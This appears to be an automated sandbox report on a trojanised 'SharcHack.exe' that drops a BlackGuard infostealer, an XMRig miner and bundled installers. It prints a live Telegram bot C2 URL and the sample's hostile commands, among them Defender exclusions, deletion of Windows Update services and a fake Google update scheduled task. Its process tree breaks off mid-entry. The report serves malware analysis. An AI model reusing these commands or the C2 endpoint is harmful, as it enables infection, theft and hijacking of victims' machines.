Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-12-2024 17:38

General

  • Target

    SharcHack.exe

  • Size

    39.9MB

  • MD5

    796310542e9fb2886de3f8cbdf88c9fa

  • SHA1

    01dc8e64ff23db2f177e3d999c12329bfcd206d3

  • SHA256

    9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193

  • SHA512

    73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966

  • SSDEEP

    786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg

Malware Config

Extracted

Family

blackguard

C2

https://api.telegram.org/bot6540906397:AAG08fPgT-V7I17vtz49STaZEuwqXqKshuM/sendMessage?chat_id=5445185021

Signatures

  • BlackGuard

    Infostealer first seen in Late 2021.

  • Blackguard family
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 63 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 10 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • NSIS installer 2 IoCs
  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 18 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\SharcHack.exe
        "C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1768
        • C:\Users\Admin\AppData\Local\Temp\3.exe
          "C:\Users\Admin\AppData\Local\Temp\3.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          PID:1660
        • C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe
          "C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1872
          • C:\Users\Admin\AppData\Local\Temp\v2.exe
            "C:\Users\Admin\AppData\Local\Temp\v2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2656
        • C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe
          "C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:768
          • C:\Users\Admin\AppData\Local\Temp\is-1UQH3.tmp\CheatEngine75.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-1UQH3.tmp\CheatEngine75.tmp" /SL5="$80150,29079073,832512,C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks for any installed AV software in registry
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            PID:2804
            • C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod0_extract\WZSetup.exe
              "C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod0_extract\WZSetup.exe" /S /tpchannelid=1571 /distid=App123
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              PID:900
              • C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe
                "C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe" install
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1744
              • C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe
                "C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe" start silent
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2560
            • C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod1_extract\avg_secure_browser_setup.exe
              "C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod1_extract\avg_secure_browser_setup.exe" /s /run_source=avg_ads_is_control /is_pixel_psh=BjYV6dOmC7Pu53CI2GVoQqIKY3UORBfPD5a5QdYE7R9gLhAgZ8KHj73WGvIUTLdf6R7Tg1fxc34Ql0B /make-default
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks for any installed AV software in registry
              • Writes to the Master Boot Record (MBR)
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:1056
            • C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod2_extract\cookie_mmm_irs_ppi_005_888_a.exe
              "C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod2_extract\cookie_mmm_irs_ppi_005_888_a.exe" /silent /ws /psh:2bJ1kmAHfOVPdDbZvELadXU3y05VWucsYJrtxXbFe3KSKCo9conhW21JtvxYrBpsh3rEC7MaFMizD
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Writes to the Master Boot Record (MBR)
              • System Location Discovery: System Language Discovery
              PID:2276
              • C:\Windows\Temp\asw.ab65a09faa6d20cc\avast_free_antivirus_setup_online_x64.exe
                "C:\Windows\Temp\asw.ab65a09faa6d20cc\avast_free_antivirus_setup_online_x64.exe" /silent /ws /psh:2bJ1kmAHfOVPdDbZvELadXU3y05VWucsYJrtxXbFe3KSKCo9conhW21JtvxYrBpsh3rEC7MaFMizD /cookie:mmm_irs_ppi_005_888_a /ga_clientid:35d772c0-ae51-44c4-af8a-3ee72fdcbfed /edat_dir:C:\Windows\Temp\asw.ab65a09faa6d20cc
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks for any installed AV software in registry
                • Writes to the Master Boot Record (MBR)
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                PID:956
                • C:\Windows\Temp\asw.c5208545c09f9ab5\instup.exe
                  "C:\Windows\Temp\asw.c5208545c09f9ab5\instup.exe" /sfx:lite /sfxstorage:C:\Windows\Temp\asw.c5208545c09f9ab5 /edition:1 /prod:ais /stub_context:6faaea0a-2bd9-4f98-a39f-c837271f115b:11119840 /guid:bcaa4a55-e761-434b-821e-1a21c941a17d /ga_clientid:35d772c0-ae51-44c4-af8a-3ee72fdcbfed /no_delayed_installation /silent /ws /psh:2bJ1kmAHfOVPdDbZvELadXU3y05VWucsYJrtxXbFe3KSKCo9conhW21JtvxYrBpsh3rEC7MaFMizD /cookie:mmm_irs_ppi_005_888_a /ga_clientid:35d772c0-ae51-44c4-af8a-3ee72fdcbfed /edat_dir:C:\Windows\Temp\asw.ab65a09faa6d20cc
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks for any installed AV software in registry
                  • Writes to the Master Boot Record (MBR)
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3016
                  • C:\Windows\Temp\asw.c5208545c09f9ab5\New_15020997\instup.exe
                    "C:\Windows\Temp\asw.c5208545c09f9ab5\New_15020997\instup.exe" /sfx /sfxstorage:C:\Windows\Temp\asw.c5208545c09f9ab5 /edition:1 /prod:ais /stub_context:6faaea0a-2bd9-4f98-a39f-c837271f115b:11119840 /guid:bcaa4a55-e761-434b-821e-1a21c941a17d /ga_clientid:35d772c0-ae51-44c4-af8a-3ee72fdcbfed /no_delayed_installation /silent /ws /psh:2bJ1kmAHfOVPdDbZvELadXU3y05VWucsYJrtxXbFe3KSKCo9conhW21JtvxYrBpsh3rEC7MaFMizD /cookie:mmm_irs_ppi_005_888_a /edat_dir:C:\Windows\Temp\asw.ab65a09faa6d20cc /online_installer
                    8⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Checks for any installed AV software in registry
                    • Writes to the Master Boot Record (MBR)
                    • Drops file in Program Files directory
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2660
                    • C:\Windows\Temp\asw.c5208545c09f9ab5\New_15020997\sbr.exe
                      "C:\Windows\Temp\asw.c5208545c09f9ab5\New_15020997\sbr.exe" 2660 "Avast Antivirus setup" "Avast Antivirus is being installed. Do not shut down your computer!"
                      9⤵
                      • Executes dropped EXE
                      PID:1920
            • C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\CheatEngine75.exe
              "C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1368
              • C:\Users\Admin\AppData\Local\Temp\is-NNQT8.tmp\CheatEngine75.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-NNQT8.tmp\CheatEngine75.tmp" /SL5="$30162,26511452,832512,C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious use of FindShellTrayWindow
                PID:2912
                • C:\Windows\system32\net.exe
                  "net" stop BadlionAntic
                  7⤵
                    PID:2784
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop BadlionAntic
                      8⤵
                        PID:2932
                    • C:\Windows\system32\net.exe
                      "net" stop BadlionAnticheat
                      7⤵
                        PID:688
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop BadlionAnticheat
                          8⤵
                            PID:1028
                        • C:\Windows\system32\sc.exe
                          "sc" delete BadlionAntic
                          7⤵
                          • Launches sc.exe
                          PID:2284
                        • C:\Windows\system32\sc.exe
                          "sc" delete BadlionAnticheat
                          7⤵
                          • Launches sc.exe
                          PID:2876
                        • C:\Users\Admin\AppData\Local\Temp\is-7V235.tmp\_isetup\_setup64.tmp
                          helper 105 0x1F8
                          7⤵
                          • Executes dropped EXE
                          PID:2420
                        • C:\Windows\system32\icacls.exe
                          "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
                          7⤵
                          • Modifies file permissions
                          PID:1504
                        • C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe
                          "C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe" /SETUP
                          7⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:788
                        • C:\Program Files\Cheat Engine 7.5\windowsrepair.exe
                          "C:\Program Files\Cheat Engine 7.5\windowsrepair.exe" /s
                          7⤵
                          • Executes dropped EXE
                          PID:1152
                        • C:\Windows\system32\icacls.exe
                          "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
                          7⤵
                          • Modifies file permissions
                          PID:1240
                    • C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe
                      "C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe"
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:1844
                      • C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64-SSE4-AVX2.exe
                        "C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64-SSE4-AVX2.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of FindShellTrayWindow
                        PID:780
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 476
                      5⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:2168
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1520
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1244
                • C:\Windows\System32\sc.exe
                  sc stop UsoSvc
                  3⤵
                  • Launches sc.exe
                  PID:2660
                • C:\Windows\System32\sc.exe
                  sc stop WaaSMedicSvc
                  3⤵
                  • Launches sc.exe
                  PID:2740
                • C:\Windows\System32\sc.exe
                  sc stop wuauserv
                  3⤵
                  • Launches sc.exe
                  PID:1872
                • C:\Windows\System32\sc.exe
                  sc stop bits
                  3⤵
                  • Launches sc.exe
                  PID:2668
                • C:\Windows\System32\sc.exe
                  sc stop dosvc
                  3⤵
                  • Launches sc.exe
                  PID:2848
                • C:\Windows\System32\reg.exe
                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                  3⤵
                    PID:2608
                  • C:\Windows\System32\reg.exe
                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                    3⤵
                      PID:2180
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                      3⤵
                      • Modifies security service
                      PID:2004
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                      3⤵
                        PID:2768
                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        3⤵
                          PID:1252
                      • C:\Windows\System32\cmd.exe
                        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        2⤵
                        • Power Settings
                        • Suspicious use of WriteProcessMemory
                        PID:2712
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2744
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2428
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2648
                        • C:\Windows\System32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          3⤵
                          • Power Settings
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2692
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2276
                        • C:\Windows\system32\schtasks.exe
                          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:2196
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2880
                        • C:\Windows\system32\schtasks.exe
                          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                          3⤵
                            PID:1528
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2928
                        • C:\Windows\System32\cmd.exe
                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                          2⤵
                            PID:1372
                            • C:\Windows\System32\sc.exe
                              sc stop UsoSvc
                              3⤵
                              • Launches sc.exe
                              PID:2852
                            • C:\Windows\System32\sc.exe
                              sc stop WaaSMedicSvc
                              3⤵
                              • Launches sc.exe
                              PID:2704
                            • C:\Windows\System32\sc.exe
                              sc stop wuauserv
                              3⤵
                              • Launches sc.exe
                              PID:2536
                            • C:\Windows\System32\sc.exe
                              sc stop bits
                              3⤵
                              • Launches sc.exe
                              PID:2284
                            • C:\Windows\System32\sc.exe
                              sc stop dosvc
                              3⤵
                              • Launches sc.exe
                              PID:2664
                            • C:\Windows\System32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                              3⤵
                                PID:3016
                              • C:\Windows\System32\reg.exe
                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                3⤵
                                  PID:3020
                                • C:\Windows\System32\reg.exe
                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                  3⤵
                                    PID:3008
                                  • C:\Windows\System32\reg.exe
                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                    3⤵
                                      PID:2420
                                    • C:\Windows\System32\reg.exe
                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                      3⤵
                                        PID:448
                                    • C:\Windows\System32\cmd.exe
                                      C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                      2⤵
                                      • Power Settings
                                      PID:2096
                                      • C:\Windows\System32\powercfg.exe
                                        powercfg /x -hibernate-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2932
                                      • C:\Windows\System32\powercfg.exe
                                        powercfg /x -hibernate-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2152
                                      • C:\Windows\System32\powercfg.exe
                                        powercfg /x -standby-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1028
                                      • C:\Windows\System32\powercfg.exe
                                        powercfg /x -standby-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1416
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                      2⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2100
                                      • C:\Windows\system32\schtasks.exe
                                        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                        3⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1504
                                    • C:\Windows\System32\conhost.exe
                                      C:\Windows\System32\conhost.exe ubulqosn
                                      2⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2120
                                    • C:\Windows\System32\cmd.exe
                                      C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                      2⤵
                                        PID:2500
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic PATH Win32_VideoController GET Name, VideoProcessor
                                          3⤵
                                          • Detects videocard installed
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1564
                                      • C:\Windows\System32\cmd.exe
                                        C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                        2⤵
                                        • Drops file in Program Files directory
                                        PID:1044
                                      • C:\Windows\System32\conhost.exe
                                        C:\Windows\System32\conhost.exe vgyegivgfazcjxdl 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/zRLKpUXs5FnM1Cz+lDKtsCEDVmxImOWutHy/wWAAF6uYRISXHrJSUiB0oBkYNVSVc+Z5TfdaGGtLWt9rhn1IwMTF8FurdYcS6sHeOOKov7n8fO9XzXfUsz+ohQT/DgIOyRpUwzATAbwxDv0BlAH+ISI2MOv7cXgWh/hEHn9UpTLH2AUxVXP8zWMLLWvPHAJe2SIfhjGncq3xQ+gVn+I4NKh77PPjDPgwHNzByaS5XiUtDR8Md5EhmkOEwD9v8Eh4nbJIewLTK837YGsKnb02yQo3e+jdFtCWzMfMeobPaXFvrKzv2emNNnxavmVO2FkfkcC1DvbnhN7NqgiVLh1FnuRerr7Rs9GSm8wk3eogEBuxtyJF/l7QvFFEn+PmzyQ6wNeX5T4KpCB8N2LdQ7qGf0xREtOLrL2we+R3IiFUCw/PgUnlB9aOUvPUntLmUYwnVg3n39kwuMDyHF7sntpqwSQW5ruNhQsPrhI9EqpLJ48=
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1580
                                    • C:\Windows\system32\taskeng.exe
                                      taskeng.exe {209B7A4C-12D2-46B9-98BF-F6CD51537E6F} S-1-5-18:NT AUTHORITY\System:Service:
                                      1⤵
                                      • Loads dropped DLL
                                      PID:2036
                                      • C:\Program Files\Google\Chrome\updater.exe
                                        "C:\Program Files\Google\Chrome\updater.exe"
                                        2⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Drops file in Program Files directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2788
                                    • C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe
                                      "C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2656
                                      • C:\Program Files (x86)\WeatherZero\WeatherZero.exe
                                        "C:\Program Files (x86)\WeatherZero\WeatherZero.exe" /q=535784FCDD3D85FB6E4ABB0B27B03964
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Modifies system certificate store
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:2792
                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xpo5vsnr.cmdline"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:484
                                          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
